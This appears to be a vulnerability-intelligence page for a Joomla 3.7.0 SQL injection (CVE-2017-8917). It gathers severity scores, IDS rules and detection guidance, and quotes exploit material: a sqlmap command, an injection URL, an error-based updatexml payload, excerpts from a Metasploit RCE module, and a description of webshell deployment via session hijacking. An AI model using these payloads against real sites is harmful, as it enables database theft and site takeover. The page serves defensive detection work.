CVE-2017-8917
published 2017-05-17CVE-2017-8917: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
PriorityP183critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
99.83%
100.0th percentile
SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | joomla_! | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27↗
commandsqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]↗
url{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)↗
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Joomla 3.7.0 - Sql Injection (CVE-2017-8917)"; flow:established,to_server; http.uri; content:".php?"; content:"option="; content:"view="; content:"layout="; content:"&list[fullordering]="; fast_pattern; pcre:"/&list\[fullordering\]=(?:[a-zA-Z0-9])*[\x22\x27\x28]/i"; reference:url,blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html; reference:cve,2017-8917; classtype:web-application-attack; sid:2024342; rev:6; metadata:affected_product Joomla, attack_target Web_Server, created_at 2017_06_01, cve CVE_2017_8917, deployment Perimeter, performance_impact Low, signature_severity Major, updated_at 2024_03_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- →The vulnerable parameter is `list[fullordering]` in a GET request to `/index.php` with `option=com_fields`, `view=fields`, and `layout=modal`. Detection should focus on anomalous values in this parameter (quotes, parentheses, SQL keywords). ↗
- →The Metasploit module exploits the SQLi to extract an active administrator session cookie from the `_session` table (userid!=0), then hijacks it to authenticate as admin and write a PHP webshell via the template editor. Monitor for unexpected PHP file creation in Joomla template directories following a 500-response on the com_fields endpoint. ↗
- →Error-based SQLi payloads using UPDATEXML and CONCAT are characteristic of this exploit. A HTTP 500 response containing garbled XML error output with embedded data is a strong indicator of successful exploitation. ↗
- →Time-based blind SQLi using SLEEP() in the `list[fullordering]` parameter can be detected by monitoring for abnormally delayed HTTP responses (e.g., 5+ seconds) on the com_fields endpoint. ↗
- →Nuclei template detection: match the MD5 hash of a known numeric value reflected in the HTTP response body after injecting `updatexml(0x23,concat(1,md5(<num>)),1)` into `list[fullordering]`.
- →Shodan/FOFA queries can identify exposed Joomla instances for proactive asset discovery: `http.component:"Joomla"` or `body="joomla! - open source content management"`.
- ·The vulnerability was introduced specifically in Joomla 3.7.0 with the new `com_fields` component and was fixed in 3.7.1. Only Joomla instances running exactly 3.7.0 are vulnerable; earlier versions do not have the com_fields component. ↗
- ·The Metasploit RCE chain requires an active logged-in Administrator or Super User session to exist in the database at the time of exploitation; if no admin is logged in, session hijacking will fail and RCE will not be achievable. ↗
- ·The SQLi is unauthenticated and exploitable without any prior login, making it accessible to any remote attacker with network access to the Joomla instance. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Joomla 3.7.0 - Sql Injection (CVE-2017-8917)
suricata·2017-06-01·CVSS 9.8
CVE-2017-8917 [CRITICAL] ET WEB_SPECIFIC_APPS Joomla 3.7.0 - Sql Injection (CVE-2017-8917)
ET WEB_SPECIFIC_APPS Joomla 3.7.0 - Sql Injection (CVE-2017-8917)
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Joomla 3.7.0 - Sql Injection (CVE-2017-8917)"; flow:established,to_server; http.uri; content:".php?"; content:"option="; content:"view="; content:"layout="; content:"&list[fullordering]="; fast_pattern; pcre:"/&list\[fullordering\]=(?:[a-zA-Z0-9])*[\x22\x27\x28]/i"; reference:url,blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html; reference:cve,2017-8917; classtype:web-application-attack; sid:2024342; rev:6; metadata:affected_product Joomla, attack_target Web_Server, created_at 2017_06_01, cve CVE_2017_8917, deployment Perimeter, performance_impact Low, signature_severity Major, updated_at 2024_03_07, mitre_tactic_id TA0001,
Exploit-DB
Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)
exploitdb·2018-03-29
CVE-2017-8917 Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)
Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Joomla Component Fields SQLi Remote Code Execution',
'Description' => %q{
This module exploits a SQL injection vulnerability in the com_fields
component, which was introduced to the core of Joomla in version 3.7.0.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mateus Lino', # Vulnerability discovery
'luisco100 ' # Metasploit module
],
'References' =>
[
[ 'CVE', '2017-8917' ], # SQLi
[ 'EDB', '42033' ],
[ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The pa
Exploit-DB
Joomla! 3.7.0 - 'com_fields' SQL Injection
exploitdb·2017-05-19·CVSS 9.8
CVE-2017-8917 [CRITICAL] Joomla! 3.7.0 - 'com_fields' SQL Injection
Joomla! 3.7.0 - 'com_fields' SQL Injection
---
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter rep
Metasploit
Joomla Component Fields SQLi Remote Code Execution
metasploit
Joomla Component Fields SQLi Remote Code Execution
Joomla Component Fields SQLi Remote Code Execution
This module exploits a SQL injection vulnerability in the com_fields component, which was introduced to the core of Joomla in version 3.7.0.
Nuclei
Joomla! <3.7.1 - SQL Injection
nuclei·CVSS 9.8
CVE-2017-8917 [CRITICAL] Joomla! <3.7.1 - SQL Injection
Joomla! <3.7.1 - SQL Injection
Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
Template:
id: CVE-2017-8917
info:
name: Joomla! <3.7.1 - SQL Injection
author: princechaddha
severity: critical
description: |
Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire Joomla! website.
remediation: |
Greynoiseio
NoiseLetter April 2024
blogs_greynoiseio
NoiseLetter April 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
arXiv
Ancora: Accurate Intrusion Recovery for Web Applications
arxiv_fulltext·2026-01-02
Ancora: Accurate Intrusion Recovery for Web Applications
: Accurate Intrusion Recovery for Web Applications
Yihao Peng^0000-0002-9190-531Xequal , Graduate Student Member, IEEE, Biao Ma^0009-0001-9372-1020equal ,
Hai Wan^0000-0002-9608-5808, Xibin Zhao^0000-0002-6168-7016, Senior Member, IEEE
Yihao Peng, Biao Ma, Hai Wan, and Xibin Zhao are with the Beijing National Research Center for Information Science and Technology (BNRist), Key Laboratory for Information System Security, Ministry of Education (KLISS), School of Software, Tsinghua University, Beijing 100084, China (e-mail: [email protected]; [email protected]; [email protected]; [email protected]).
authors contributed equally to this work.
IEEE TRANSACTIONS ON DEPENDABLE AND SECURE COMPUTING, Vol. , 2025Peng and Ma et al.: : Accurate Intrusion Recovery for Web Applications
## Abs
http://www.securityfocus.com/bid/98515http://www.securitytracker.com/id/1038522https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.htmlhttps://www.exploit-db.com/exploits/42033/https://www.exploit-db.com/exploits/44358/http://www.securityfocus.com/bid/98515http://www.securitytracker.com/id/1038522https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.htmlhttps://www.exploit-db.com/exploits/42033/https://www.exploit-db.com/exploits/44358/
2017-05-17
Published